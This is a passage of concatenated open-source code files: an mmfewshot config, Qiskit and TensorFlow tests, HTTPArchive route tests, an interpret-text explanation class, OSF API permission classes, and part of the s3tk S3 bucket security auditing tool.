lr_config = dict(
warmup_iters=500,
warmup_ratio=1. / 3,
step=[1300],
)
runner = dict(max_iters=2000)
# load_from = 'path of base training model'
load_from = (
'work_dirs/mpsr_r101_fpn_2xb2_voc-split1_base-training/latest.pth')
model = dict(
roi_head=dict(
bbox_roi_extractor=dict(roi_layer=dict(aligned=False)),
bbox_head=dict(init_cfg=[
dict(
type='Normal',
override=dict(type='Normal', name='fc_cls', std=0.001))
])))
|
test/algorithms/test_warm_start_qaoa.py | X-Libor/qiskit-optimization | 109 | 12610831 | <filename>test/algorithms/test_warm_start_qaoa.py
# This code is part of Qiskit.
#
# (C) Copyright IBM 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
""" Test warm start QAOA optimizer. """
from test import QiskitOptimizationTestCase, requires_extra_library
import numpy as np
from docplex.mp.model import Model
from qiskit import BasicAer
from qiskit.algorithms import QAOA
from qiskit_optimization.algorithms import SlsqpOptimizer
from qiskit_optimization.algorithms.goemans_williamson_optimizer import (
GoemansWilliamsonOptimizer,
)
from qiskit_optimization.algorithms.warm_start_qaoa_optimizer import (
MeanAggregator,
WarmStartQAOAOptimizer,
)
from qiskit_optimization.applications.max_cut import Maxcut
from qiskit_optimization.translators import from_docplex_mp
class TestWarmStartQAOAOptimizer(QiskitOptimizationTestCase):
"""Tests for the warm start QAOA optimizer."""
@requires_extra_library
def test_max_cut(self):
"""Basic test on the max cut problem."""
graph = np.array(
[
[0.0, 1.0, 2.0, 0.0],
[1.0, 0.0, 1.0, 0.0],
[2.0, 1.0, 0.0, 1.0],
[0.0, 0.0, 1.0, 0.0],
]
)
presolver = GoemansWilliamsonOptimizer(num_cuts=10)
problem = Maxcut(graph).to_quadratic_program()
backend = BasicAer.get_backend("statevector_simulator")
qaoa = QAOA(quantum_instance=backend, reps=1)
aggregator = MeanAggregator()
optimizer = WarmStartQAOAOptimizer(
pre_solver=presolver,
relax_for_pre_solver=False,
qaoa=qaoa,
epsilon=0.25,
num_initial_solutions=10,
aggregator=aggregator,
)
result_warm = optimizer.solve(problem)
self.assertIsNotNone(result_warm)
self.assertIsNotNone(result_warm.x)
np.testing.assert_almost_equal([0, 0, 1, 0], result_warm.x, 3)
self.assertIsNotNone(result_warm.fval)
np.testing.assert_almost_equal(4, result_warm.fval, 3)
def test_constrained_binary(self):
"""Constrained binary optimization problem."""
model = Model()
v = model.binary_var(name="v")
w = model.binary_var(name="w")
# pylint:disable=invalid-name
t = model.binary_var(name="t")
model.minimize(v + w + t)
model.add_constraint(2 * v + 10 * w + t <= 3, "cons1")
model.add_constraint(v + w + t >= 2, "cons2")
problem = from_docplex_mp(model)
backend = BasicAer.get_backend("statevector_simulator")
qaoa = QAOA(quantum_instance=backend, reps=1)
aggregator = MeanAggregator()
optimizer = WarmStartQAOAOptimizer(
pre_solver=SlsqpOptimizer(),
relax_for_pre_solver=True,
qaoa=qaoa,
epsilon=0.25,
aggregator=aggregator,
)
result_warm = optimizer.solve(problem)
self.assertIsNotNone(result_warm)
self.assertIsNotNone(result_warm.x)
np.testing.assert_almost_equal([1, 0, 1], result_warm.x, 3)
self.assertIsNotNone(result_warm.fval)
np.testing.assert_almost_equal(2, result_warm.fval, 3)
def test_simple_qubo(self):
"""Test on a simple QUBO problem."""
model = Model()
# pylint:disable=invalid-name
u = model.binary_var(name="u")
v = model.binary_var(name="v")
model.minimize((u - v + 2) ** 2)
problem = from_docplex_mp(model)
backend = BasicAer.get_backend("statevector_simulator")
qaoa = QAOA(quantum_instance=backend, reps=1)
optimizer = WarmStartQAOAOptimizer(
pre_solver=SlsqpOptimizer(),
relax_for_pre_solver=True,
qaoa=qaoa,
epsilon=0.25,
)
result_warm = optimizer.solve(problem)
self.assertIsNotNone(result_warm)
self.assertIsNotNone(result_warm.x)
np.testing.assert_almost_equal([0, 1], result_warm.x, 3)
self.assertIsNotNone(result_warm.fval)
np.testing.assert_almost_equal(1, result_warm.fval, 3)
|
official/nlp/modeling/ops/segment_extractor_test.py | akshit-protonn/models | 82,518 | 12610841 | <filename>official/nlp/modeling/ops/segment_extractor_test.py
# Copyright 2021 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# encoding=utf-8
"""Tests for sentence prediction labels."""
import functools
from absl.testing import parameterized
import tensorflow as tf
from official.nlp.modeling.ops import segment_extractor
class NextSentencePredictionTest(parameterized.TestCase, tf.test.TestCase):
@parameterized.parameters([
dict(
test_description="all random",
sentences=[[b"Hello there.", b"La la la.", b"Such is life."],
[b"Who let the dogs out?", b"Who?."]],
expected_segment=[[
b"Who let the dogs out?", b"Who?.", b"Who let the dogs out?"
], [b"Hello there.", b"Hello there."]],
expected_labels=[
[False, False, False],
[False, False],
],
random_threshold=0.0,
),
dict(
test_description="all next",
sentences=[[b"Hello there.", b"La la la.", b"Such is life."],
[b"Who let the dogs out?", b"Who?."]],
expected_segment=[
[b"La la la.", b"Such is life.", b"Who let the dogs out?"],
[b"Who?.", b"Hello there."],
],
expected_labels=[
[True, True, False],
[True, False],
],
random_threshold=1.0,
),
])
def testNextSentencePrediction(self,
sentences,
expected_segment,
expected_labels,
random_threshold=0.5,
test_description=""):
sentences = tf.ragged.constant(sentences)
    # Fix the random function to tf.random.stateless_uniform with a constant
    # seed so that the results are consistent and deterministic.
extracted_segment, actual_labels = (
segment_extractor.get_next_sentence_labels(
sentences,
random_threshold,
random_fn=functools.partial(
tf.random.stateless_uniform, seed=(2, 3))))
self.assertAllEqual(expected_segment, extracted_segment)
self.assertAllEqual(expected_labels, actual_labels)
class SentenceOrderLabelsTest(parameterized.TestCase, tf.test.TestCase):
@parameterized.parameters([
dict(
test_description="all random",
sentences=[[b"Hello there.", b"La la la.", b"Such is life."],
[b"Who let the dogs out?", b"Who?."]],
expected_segment=[[
b"Who let the dogs out?", b"Who?.", b"Who let the dogs out?"
], [b"Hello there.", b"Hello there."]],
expected_labels=[[True, True, True], [True, True]],
random_threshold=0.0,
random_next_threshold=0.0,
),
dict(
test_description="all next",
sentences=[[b"Hello there.", b"La la la.", b"Such is life."],
[b"Who let the dogs out?", b"Who?."]],
expected_segment=[[
b"La la la.", b"Such is life.", b"Who let the dogs out?"
], [b"Who?.", b"Hello there."]],
expected_labels=[[True, True, True], [True, True]],
random_threshold=1.0,
random_next_threshold=0.0,
),
dict(
          test_description="all preceding",
sentences=[[b"Hello there.", b"La la la.", b"Such is life."],
[b"Who let the dogs out?", b"Who?."]],
expected_segment=[
[b"La la la.", b"Hello there.", b"Hello there."],
[b"Who?.", b"Who let the dogs out?"],
],
expected_labels=[
[True, False, False],
[True, False],
],
random_threshold=1.0,
random_next_threshold=1.0,
),
])
def testSentenceOrderPrediction(self,
sentences,
expected_segment,
expected_labels,
random_threshold=0.5,
random_next_threshold=0.5,
test_description=""):
sentences = tf.ragged.constant(sentences)
    # Fix the random function to tf.random.stateless_uniform with a constant
    # seed so that the results are consistent and deterministic.
extracted_segment, actual_labels = (
segment_extractor.get_sentence_order_labels(
sentences,
random_threshold=random_threshold,
random_next_threshold=random_next_threshold,
random_fn=functools.partial(
tf.random.stateless_uniform, seed=(2, 3))))
self.assertAllEqual(expected_segment, extracted_segment)
self.assertAllEqual(expected_labels, actual_labels)
if __name__ == "__main__":
tf.test.main()
|
main_test.py | HTTPArchive/httparchive.org | 269 | 12610843 | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from main import app, talisman
import pytest
# Create test client without https redirect
# (normally taken care of by running in debug)
@pytest.fixture
def client():
with app.test_client() as client:
talisman.force_https = False
yield client
# Helper function to test a route's status code and optional redirect location
def assert_route(client, path, status, location=None):
response = client.get(path)
redirect_loc = response.location
if redirect_loc:
redirect_loc = redirect_loc.replace("http://localhost", "")
if location is not None:
assert response.status_code == status and redirect_loc == location
else:
assert response.status_code == status
def test_index(client):
assert_route(client, "/", 200)
def test_reports(client):
assert_route(client, "/reports", 200)
def test_report(client):
assert_route(client, "/reports/state-of-the-web", 200)
def test_external_report(client):
assert_route(
client,
"/reports/cwv-tech",
302,
"https://datastudio.google.com/u/0/reporting/55bc8fad-44c2-4280-aa0b-5f3f0cd3d2be/page/M6ZPC",
)
|
python/interpret_text/experimental/explanation.py | imatiach-msft/interpret-text | 277 | 12610855 | <filename>python/interpret_text/experimental/explanation.py
# ---------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# ---------------------------------------------------------
"""Defines the explanations that are returned from explaining models."""
import numpy as np
import uuid
from interpret_community.common.explanation_utils import _sort_values, _order_imp
from interpret_community.common.constants import Dynamic, ExplanationParams, ExplainParams
from interpret_community.explanation.explanation import (
LocalExplanation,
ExpectedValuesMixin,
ClassesMixin,
)
class TextExplanation(LocalExplanation):
"""Defines the mixin for text explanations."""
def __init__(self, predicted_label=None, true_label=None, **kwargs):
"""Create the text explanation.
:param predicted_label: The label predicted by the classifier
:type predicted_label: string
:param true_label: The ground truth label for the sentence
:type true_label: string
"""
super(TextExplanation, self).__init__(**kwargs)
order = _order_imp(np.abs(self.local_importance_values))
self._local_importance_rank = _sort_values(self._features, order)
self._predicted_label = predicted_label
self._true_label = true_label
self._logger.debug("Initializing TextExplanation")
if len(order.shape) == 3:
i = np.arange(order.shape[0])[:, np.newaxis]
j = np.arange(order.shape[1])[:, np.newaxis]
self._ordered_local_importance_values = np.array(
self.local_importance_values
)[i, j, order]
else:
self._ordered_local_importance_values = self.local_importance_values
@property
def predicted_label(self):
"""Get the predicted label of the document from original model.
:return: The predicted label of the document.
:rtype: string
"""
return self._predicted_label
@property
def local_importance_rank(self):
"""Feature names sorted by importance.
This property exists for text explanations only and not for local because currently
we are doing text explanations for a single document and it is more difficult to
define order for multiple instances. Note this is subject to change if we eventually
add global explanations for text explainers.
:return: The feature names sorted by importance.
:rtype: list
"""
return self._local_importance_rank.tolist()
@property
def ordered_local_importance_values(self):
"""Get the feature importance values ordered by importance.
This property exists for text explanations only and not for local because currently
we are doing text explanations for a single document and it is more difficult to
define order for multiple instances. Note this is subject to change if we eventually
add global explanations for text explainers.
:return: For a model with a single output such as regression, this
returns a list of feature importance values. For models with vector outputs this function
returns a list of such lists, one for each output. The dimension of this matrix
is (# examples x # features).
:rtype: list
"""
return self._ordered_local_importance_values
@classmethod
def _does_quack(cls, explanation):
"""Validate that the explanation object passed in is a valid TextExplanation.
:param explanation: The explanation to be validated.
:type explanation: object
:return: True if valid else False
:rtype: bool
"""
if not super()._does_quack(explanation):
return False
if (
not hasattr(explanation, ExplainParams.LOCAL_IMPORTANCE_RANK)
or explanation.local_importance_rank is None
):
return False
if (
not hasattr(explanation, ExplainParams.ORDERED_LOCAL_IMPORTANCE_VALUES)
or explanation.ordered_local_importance_values is None
):
return False
return True
def _create_local_explanation(
expected_values=None,
classification=True,
text_explanation=False,
image_explanation=False,
explanation_id=None,
**kwargs
):
"""Dynamically creates an explanation based on local type and specified data.
:param expected_values: The expected values of the model.
:type expected_values: list
:param classification: Indicates if this is a classification or regression explanation.
:type classification: bool
:param text_explanation: Indicates if this is a text explanation.
:type text_explanation: bool
:param image_explanation: Indicates if this is an image explanation.
:type image_explanation: bool
:param explanation_id: If specified, puts the local explanation under a preexisting explanation object.
If not, a new unique identifier will be created for the explanation.
:type explanation_id: str
:return: A model explanation object. It is guaranteed to be a LocalExplanation. If expected_values is not None, it
will also have the properties of the ExpectedValuesMixin. If classification is set to True, it will have the
properties of the ClassesMixin. If text_explanation is set to True, it will have the properties of
TextExplanation.
:rtype: DynamicLocalExplanation
"""
exp_id = explanation_id or str(uuid.uuid4())
if text_explanation:
mixins = [TextExplanation]
else:
mixins = [LocalExplanation]
if expected_values is not None:
mixins.append(ExpectedValuesMixin)
kwargs[ExplanationParams.EXPECTED_VALUES] = expected_values
if classification:
mixins.append(ClassesMixin)
DynamicLocalExplanation = type(Dynamic.LOCAL_EXPLANATION, tuple(mixins), {})
local_explanation = DynamicLocalExplanation(explanation_id=exp_id, **kwargs)
return local_explanation
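# Rough usage sketch (illustrative only; the keyword names below mirror the
# attributes used in this module and are assumptions about what the
# interpret-community base classes accept):
#
#     explanation = _create_local_explanation(
#         classification=True,
#         text_explanation=True,
#         local_importance_values=importance_scores,  # per-token scores
#         features=tokens,                             # tokenized document
#         predicted_label=predicted,
#     )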
|
api/nodes/permissions.py | gaybro8777/osf.io | 628 | 12610860 | # -*- coding: utf-8 -*-
from rest_framework import permissions
from rest_framework import exceptions
from addons.base.models import BaseAddonSettings
from osf.models import (
AbstractNode,
Contributor,
DraftNode,
DraftRegistration,
Institution,
Node,
NodeRelation,
OSFGroup,
OSFUser,
Preprint,
PrivateLink,
)
from osf.utils import permissions as osf_permissions
from api.base.utils import get_user_auth, is_deprecated, assert_resource_type
class ContributorOrPublic(permissions.BasePermission):
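    """Allow read access when the resource is public or viewable by the
    requester; require edit permission for any modification."""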
acceptable_models = (AbstractNode, NodeRelation, Preprint, DraftRegistration)
def has_object_permission(self, request, view, obj):
from api.nodes.views import NodeStorageProvider
if isinstance(obj, BaseAddonSettings):
obj = obj.owner
if isinstance(obj, NodeStorageProvider):
obj = obj.node
if isinstance(obj, DraftNode):
obj = obj.registered_draft.first()
if isinstance(obj, dict):
obj = obj.get('self', None)
assert_resource_type(obj, self.acceptable_models)
auth = get_user_auth(request)
if request.method in permissions.SAFE_METHODS:
return obj.is_public or obj.can_view(auth)
else:
return obj.can_edit(auth)
class IsPublic(permissions.BasePermission):
acceptable_models = (AbstractNode,)
def has_object_permission(self, request, view, obj):
assert_resource_type(obj, self.acceptable_models)
auth = get_user_auth(request)
return obj.is_public or obj.can_view(auth)
class IsAdminContributor(permissions.BasePermission):
"""
Use on API views where the requesting user needs to be an
admin contributor to make changes. Admin group membership
is not sufficient.
"""
acceptable_models = (AbstractNode, DraftRegistration,)
def has_object_permission(self, request, view, obj):
assert_resource_type(obj, self.acceptable_models)
auth = get_user_auth(request)
if request.method in permissions.SAFE_METHODS:
return obj.has_permission(auth.user, osf_permissions.ADMIN)
else:
return obj.is_admin_contributor(auth.user)
class EditIfPublic(permissions.BasePermission):
acceptable_models = (AbstractNode,)
def has_object_permission(self, request, view, obj):
assert_resource_type(obj, self.acceptable_models)
if request.method not in permissions.SAFE_METHODS:
return obj.is_public
return True
class IsAdmin(permissions.BasePermission):
acceptable_models = (AbstractNode, PrivateLink,)
def has_object_permission(self, request, view, obj):
assert_resource_type(obj, self.acceptable_models)
if isinstance(obj, PrivateLink):
obj = view.get_node()
auth = get_user_auth(request)
return obj.has_permission(auth.user, osf_permissions.ADMIN)
class AdminDeletePermissions(permissions.BasePermission):
acceptable_models = (AbstractNode, DraftRegistration)
def has_object_permission(self, request, view, obj):
"""
Admin perms are required to delete a node
"""
assert_resource_type(obj, self.acceptable_models)
auth = get_user_auth(request)
if request.method == 'DELETE':
return obj.has_permission(auth.user, osf_permissions.ADMIN)
return True
class IsContributorOrGroupMember(permissions.BasePermission):
def has_object_permission(self, request, view, obj):
        assert isinstance(obj, AbstractNode), 'obj must be a Node, got {}'.format(obj)
auth = get_user_auth(request)
if request.method in permissions.SAFE_METHODS:
return obj.is_contributor_or_group_member(auth.user)
else:
return obj.has_permission(auth.user, osf_permissions.WRITE)
class AdminOrPublic(permissions.BasePermission):
acceptable_models = (AbstractNode, OSFUser, Institution, BaseAddonSettings, DraftRegistration,)
def has_object_permission(self, request, view, obj):
if isinstance(obj, dict) and 'self' in obj:
obj = obj['self']
assert_resource_type(obj, self.acceptable_models)
auth = get_user_auth(request)
if request.method in permissions.SAFE_METHODS:
return obj.is_public or obj.can_view(auth)
else:
return obj.has_permission(auth.user, osf_permissions.ADMIN)
class AdminContributorOrPublic(permissions.BasePermission):
acceptable_models = (AbstractNode, DraftRegistration,)
def has_object_permission(self, request, view, obj):
"""
To make changes, user must be an admin contributor. Admin group membership is not sufficient.
"""
assert_resource_type(obj, self.acceptable_models)
auth = get_user_auth(request)
if request.method in permissions.SAFE_METHODS:
return obj.is_public or obj.can_view(auth)
else:
return obj.is_admin_contributor(auth.user)
class ExcludeWithdrawals(permissions.BasePermission):
def has_object_permission(self, request, view, obj):
if isinstance(obj, Node):
node = obj
else:
context = request.parser_context['kwargs']
node = AbstractNode.load(context[view.node_lookup_url_kwarg])
if node.is_retracted:
return False
return True
class ReadOnlyIfWithdrawn(permissions.BasePermission):
def has_object_permission(self, request, view, obj):
if isinstance(obj, Node):
node = obj
else:
context = request.parser_context['kwargs']
node = AbstractNode.load(context[view.node_lookup_url_kwarg])
if node.is_retracted:
return request.method in permissions.SAFE_METHODS
return True
class ContributorDetailPermissions(permissions.BasePermission):
"""Permissions for contributor detail page."""
acceptable_models = (AbstractNode, OSFUser, Contributor,)
def load_resource(self, context, view):
return AbstractNode.load(context[view.node_lookup_url_kwarg])
def has_object_permission(self, request, view, obj):
assert_resource_type(obj, self.acceptable_models)
auth = get_user_auth(request)
context = request.parser_context['kwargs']
resource = self.load_resource(context, view)
user = OSFUser.load(context['user_id'])
if request.method in permissions.SAFE_METHODS:
return resource.is_public or resource.can_view(auth)
elif request.method == 'DELETE':
return resource.has_permission(auth.user, osf_permissions.ADMIN) or auth.user == user
else:
return resource.has_permission(auth.user, osf_permissions.ADMIN)
class NodeGroupDetailPermissions(permissions.BasePermission):
"""Permissions for node group detail - involving who can update the relationship
between a node and an OSF Group."""
acceptable_models = (OSFGroup, AbstractNode,)
def load_resource(self, context, view):
return AbstractNode.load(context[view.node_lookup_url_kwarg])
def has_object_permission(self, request, view, obj):
assert_resource_type(obj, self.acceptable_models)
auth = get_user_auth(request)
node = self.load_resource(request.parser_context['kwargs'], view)
if request.method in permissions.SAFE_METHODS:
return node.is_public or node.can_view(auth)
elif request.method == 'DELETE':
# If deleting an OSF group from a node, you either need admin perms
# or you need to be an OSF group manager
return node.has_permission(auth.user, osf_permissions.ADMIN) or obj.has_permission(auth.user, 'manage')
else:
return node.has_permission(auth.user, osf_permissions.ADMIN)
class ContributorOrPublicForPointers(permissions.BasePermission):
acceptable_models = (AbstractNode, NodeRelation,)
def has_object_permission(self, request, view, obj):
assert_resource_type(obj, self.acceptable_models)
auth = get_user_auth(request)
parent_node = AbstractNode.load(request.parser_context['kwargs']['node_id'])
pointer_node = NodeRelation.load(request.parser_context['kwargs']['node_link_id']).child
if request.method in permissions.SAFE_METHODS:
has_parent_auth = parent_node.can_view(auth)
has_pointer_auth = pointer_node.can_view(auth)
public = pointer_node.is_public
has_auth = public or (has_parent_auth and has_pointer_auth)
return has_auth
else:
has_auth = parent_node.can_edit(auth)
return has_auth
class ContributorOrPublicForRelationshipPointers(permissions.BasePermission):
def has_object_permission(self, request, view, obj):
assert isinstance(obj, dict)
auth = get_user_auth(request)
parent_node = obj['self']
if request.method in permissions.SAFE_METHODS:
return parent_node.can_view(auth)
elif request.method == 'DELETE':
return parent_node.can_edit(auth)
else:
has_parent_auth = parent_node.can_edit(auth)
if not has_parent_auth:
return False
pointer_nodes = []
for pointer in request.data.get('data', []):
node = AbstractNode.load(pointer['id'])
if not node or node.is_collection:
raise exceptions.NotFound(detail='Node with id "{}" was not found'.format(pointer['id']))
pointer_nodes.append(node)
has_pointer_auth = True
for pointer in pointer_nodes:
if not pointer.can_view(auth):
has_pointer_auth = False
break
return has_pointer_auth
class RegistrationAndPermissionCheckForPointers(permissions.BasePermission):
def has_object_permission(self, request, view, obj):
node_link = NodeRelation.load(request.parser_context['kwargs']['node_link_id'])
node = AbstractNode.load(request.parser_context['kwargs'][view.node_lookup_url_kwarg])
auth = get_user_auth(request)
        if request.method == 'DELETE' and node.is_registration:
raise exceptions.MethodNotAllowed(method=request.method)
if node.is_collection or node.is_registration:
raise exceptions.NotFound
if node != node_link.parent:
raise exceptions.NotFound
if request.method == 'DELETE' and not node.can_edit(auth):
return False
return True
class WriteOrPublicForRelationshipInstitutions(permissions.BasePermission):
def has_object_permission(self, request, view, obj):
assert isinstance(obj, dict)
auth = get_user_auth(request)
node = obj['self']
if request.method in permissions.SAFE_METHODS:
return node.is_public or node.can_view(auth)
else:
return node.has_permission(auth.user, osf_permissions.WRITE)
class ReadOnlyIfRegistration(permissions.BasePermission):
"""Makes PUT and POST forbidden for registrations."""
acceptable_models = (AbstractNode,)
def has_object_permission(self, request, view, obj):
# Preprints cannot be registrations
if isinstance(obj, Preprint):
return True
if not isinstance(obj, AbstractNode):
obj = AbstractNode.load(request.parser_context['kwargs'][view.node_lookup_url_kwarg])
assert_resource_type(obj, self.acceptable_models)
if obj.is_registration:
return request.method in permissions.SAFE_METHODS
return True
class WriteAdmin(permissions.BasePermission):
acceptable_models = (AbstractNode,)
def has_object_permission(self, request, view, obj):
auth = get_user_auth(request)
return obj.can_edit(auth)
class ShowIfVersion(permissions.BasePermission):
def __init__(self, min_version, max_version, deprecated_message):
super(ShowIfVersion, self).__init__()
self.min_version = min_version
self.max_version = max_version
self.deprecated_message = deprecated_message
def has_object_permission(self, request, view, obj):
if is_deprecated(request.version, self.min_version, self.max_version):
raise exceptions.NotFound(detail=self.deprecated_message)
return True
class NodeLinksShowIfVersion(ShowIfVersion):
def __init__(self):
min_version = '2.0'
max_version = '2.0'
deprecated_message = 'This feature is deprecated as of version 2.1'
super(NodeLinksShowIfVersion, self).__init__(min_version, max_version, deprecated_message)
|
s3tk/__init__.py | ankane/s3tk | 432 | 12610870 | # -*- coding: utf-8 -*-
import sys
import os.path
import json
import fnmatch
from collections import Counter, OrderedDict
import boto3
import botocore
import click
from joblib import Parallel, delayed
from clint.textui import colored, puts, indent
from .checks import AclCheck, PolicyCheck, PublicAccessCheck, LoggingCheck, VersioningCheck, EncryptionCheck, ObjectLoggingCheck
__version__ = '0.3.1'
canned_acls = [
{
'acl': 'private',
'grants': []
},
{
'acl': 'public-read',
'grants': [
{'Grantee': {'Type': 'Group', 'URI': 'http://acs.amazonaws.com/groups/global/AllUsers'}, 'Permission': 'READ'}
]
},
{
'acl': 'public-read-write',
'grants': [
{'Grantee': {'Type': 'Group', 'URI': 'http://acs.amazonaws.com/groups/global/AllUsers'}, 'Permission': 'READ'},
{'Grantee': {u'Type': 'Group', u'URI': 'http://acs.amazonaws.com/groups/global/AllUsers'}, 'Permission': 'WRITE'}
]
},
{
'acl': 'authenticated-read',
'grants': [
{'Grantee': {'Type': 'Group', 'URI': 'http://acs.amazonaws.com/groups/global/AuthenticatedUsers'}, 'Permission': 'READ'}
]
},
{
'acl': 'aws-exec-read',
'grants': [
{'Grantee': {'Type': 'CanonicalUser', 'DisplayName': 'za-team', 'ID': '6aa5a366c34c1cbe25dc49211496e913e0351eb0e8c37aa3477e40942ec6b97c'}, 'Permission': 'READ'}
]
}
]
cached_s3 = None
def s3():
# memoize
global cached_s3
if cached_s3 is None:
cached_s3 = boto3.resource('s3')
return cached_s3
def notice(message):
puts(colored.yellow(message))
def abort(message):
puts(colored.red(message))
sys.exit(1)
def unicode_key(key):
if sys.version_info[0] < 3 and isinstance(key, unicode):
return key.encode('utf-8')
else:
return key
def perform(check):
check.perform()
with indent(2):
if check.status == 'passed':
puts(colored.green('✔ ' + check.name + ' ' + unicode_key(check.pass_message)))
elif check.status == 'failed':
puts(colored.red('✘ ' + check.name + ' ' + check.fail_message))
else:
puts(colored.red('✘ ' + check.name + ' access denied'))
return check
def fetch_buckets(buckets):
if buckets:
if any('*' in b for b in buckets):
return [b for b in s3().buckets.all() if any(fnmatch.fnmatch(b.name, bn) for bn in buckets)]
else:
return [s3().Bucket(bn) for bn in buckets]
else:
return s3().buckets.all()
def fix_check(klass, buckets, dry_run, fix_args={}):
for bucket in fetch_buckets(buckets):
check = klass(bucket)
check.perform()
if check.status == 'passed':
message = colored.green('already ' + check.pass_message)
elif check.status == 'denied':
message = colored.red('access denied')
else:
if dry_run:
message = colored.yellow('to be ' + check.pass_message)
else:
try:
check.fix(fix_args)
message = colored.blue('just ' + check.pass_message)
except botocore.exceptions.ClientError as e:
message = colored.red(str(e))
puts(bucket.name + ' ' + message)
def encrypt_object(bucket_name, key, dry_run, kms_key_id, customer_key):
obj = s3().Object(bucket_name, key)
str_key = unicode_key(key)
try:
if customer_key:
obj.load(SSECustomerAlgorithm='AES256', SSECustomerKey=customer_key)
encrypted = None
if customer_key:
encrypted = obj.sse_customer_algorithm is not None
elif kms_key_id:
encrypted = obj.server_side_encryption == 'aws:kms'
else:
encrypted = obj.server_side_encryption == 'AES256'
if encrypted:
puts(str_key + ' ' + colored.green('already encrypted'))
return 'already encrypted'
else:
if dry_run:
puts(str_key + ' ' + colored.yellow('to be encrypted'))
return 'to be encrypted'
else:
copy_source = {'Bucket': bucket_name, 'Key': obj.key}
# TODO support going from customer encryption to other forms
if kms_key_id:
obj.copy_from(
CopySource=copy_source,
ServerSideEncryption='aws:kms',
SSEKMSKeyId=kms_key_id
)
elif customer_key:
obj.copy_from(
CopySource=copy_source,
SSECustomerAlgorithm='AES256',
SSECustomerKey=customer_key
)
else:
obj.copy_from(
CopySource=copy_source,
ServerSideEncryption='AES256'
)
puts(str_key + ' ' + colored.blue('just encrypted'))
return 'just encrypted'
except (botocore.exceptions.ClientError, botocore.exceptions.NoCredentialsError) as e:
puts(str_key + ' ' + colored.red(str(e)))
return 'error'
def determine_mode(acl):
owner = acl.owner
grants = acl.grants
non_owner_grants = [grant for grant in grants if not (grant['Grantee'].get('ID') == owner['ID'] and grant['Permission'] == 'FULL_CONTROL')]
# TODO bucket-owner-read and bucket-owner-full-control
return next((ca['acl'] for ca in canned_acls if ca['grants'] == non_owner_grants), 'custom')
def scan_object(bucket_name, key):
obj = s3().Object(bucket_name, key)
str_key = unicode_key(key)
try:
mode = determine_mode(obj.Acl())
if mode == 'private':
puts(str_key + ' ' + colored.green(mode))
else:
puts(str_key + ' ' + colored.yellow(mode))
return mode
except (botocore.exceptions.ClientError, botocore.exceptions.NoCredentialsError) as e:
puts(str_key + ' ' + colored.red(str(e)))
return 'error'
def reset_object(bucket_name, key, dry_run, acl):
obj = s3().Object(bucket_name, key)
str_key = unicode_key(key)
try:
obj_acl = obj.Acl()
mode = determine_mode(obj_acl)
if mode == acl:
puts(str_key + ' ' + colored.green('ACL already ' + acl))
return 'ACL already ' + acl
elif dry_run:
puts(str_key + ' ' + colored.yellow('ACL to be updated to ' + acl))
return 'ACL to be updated to ' + acl
else:
obj_acl.put(ACL=acl)
puts(str_key + ' ' + colored.blue('ACL updated to ' + acl))
return 'ACL updated to ' + acl
except (botocore.exceptions.ClientError, botocore.exceptions.NoCredentialsError) as e:
puts(str_key + ' ' + colored.red(str(e)))
return 'error'
def delete_unencrypted_version(bucket_name, key, id, dry_run):
object_version = s3().ObjectVersion(bucket_name, key, id)
try:
obj = object_version.get()
if obj.get('ServerSideEncryption') or obj.get('SSECustomerAlgorithm'):
puts(key + ' ' + id + ' ' + colored.green('encrypted'))
return 'encrypted'
else:
if dry_run:
puts(key + ' ' + id + ' ' + colored.blue('to be deleted'))
return 'to be deleted'
else:
puts(key + ' ' + id + ' ' + colored.blue('deleted'))
object_version.delete()
return 'deleted'
except (botocore.exceptions.ClientError, botocore.exceptions.NoCredentialsError) as e:
puts(key + ' ' + id + ' ' + colored.red(str(e)))
return 'error'
def object_matches(key, only, _except):
match = True
if only:
match = fnmatch.fnmatch(key, only)
if _except and match:
match = not fnmatch.fnmatch(key, _except)
return match
def parallelize(bucket, only, _except, fn, args=(), versions=False):
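    # Applies fn to every matching object (or to every non-latest object
    # version when versions=True) in the bucket, in parallel, and returns the
    # per-object results.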
bucket = s3().Bucket(bucket)
# use prefix for performance
prefix = None
if only:
# get the first prefix before wildcard
prefix = '/'.join(only.split('*')[0].split('/')[:-1])
if prefix:
prefix = prefix + '/'
if versions:
object_versions = bucket.object_versions.filter(Prefix=prefix) if prefix else bucket.object_versions.all()
# delete markers have no size
return Parallel(n_jobs=24)(delayed(fn)(bucket.name, ov.object_key, ov.id, *args) for ov in object_versions if object_matches(ov.object_key, only, _except) and not ov.is_latest and ov.size is not None)
else:
objects = bucket.objects.filter(Prefix=prefix) if prefix else bucket.objects.all()
if only and not '*' in only:
            objects = [s3().Object(bucket.name, only)]
return Parallel(n_jobs=24)(delayed(fn)(bucket.name, os.key, *args) for os in objects if object_matches(os.key, only, _except))
def public_statement(bucket):
return OrderedDict([
('Sid', 'Public'),
('Effect', 'Allow'),
('Principal', '*'),
('Action', 's3:GetObject'),
('Resource', 'arn:aws:s3:::%s/*' % bucket.name)
])
def no_object_acl_statement(bucket):
return OrderedDict([
('Sid', 'NoObjectAcl'),
('Effect', 'Deny'),
('Principal', '*'),
('Action', 's3:PutObjectAcl'),
('Resource', 'arn:aws:s3:::%s/*' % bucket.name)
])
def public_uploads_statement(bucket):
return OrderedDict([
('Sid', 'PublicUploads'),
('Effect', 'Deny'),
('Principal', '*'),
('Action', ['s3:PutObject', 's3:PutObjectAcl']),
